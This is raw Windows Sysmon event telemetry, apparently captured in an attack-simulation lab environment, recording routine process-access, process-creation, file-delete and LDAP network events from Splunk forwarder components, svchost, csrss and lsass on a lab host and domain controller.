10:48:48.060{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1110-6216-4C04-000000003902}1112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1110-6216-4C04-000000003902}1112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.061{4F8D34B0-1110-6216-4C04-000000003902}1112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:49.894{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46047084C0D90B32B1E3C151DE7FB110,SHA256=79B54915F057C1C173B2FA5FC7A7A673804555F88E2EB625CA50266D47789142,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1111-6216-4E04-000000003902}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1111-6216-4E04-000000003902}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.873{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1111-6216-4E04-000000003902}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.874{4F8D34B0-1111-6216-4E04-000000003902}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000216328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.607{4F8D34B0-1111-6216-4D04-000000003902}29963140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.529{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=301F594CF34FA6449161CE987CBEB664,SHA256=77FC0DF63CC060A60542318CEAB610992A2A19851282BCB2D824E9A4C6B9C3EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:47.055{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53413-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:47.055{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53413-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 10341000x8000000000000000216326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:49.373{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1111-6216-4D04-000000003902}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 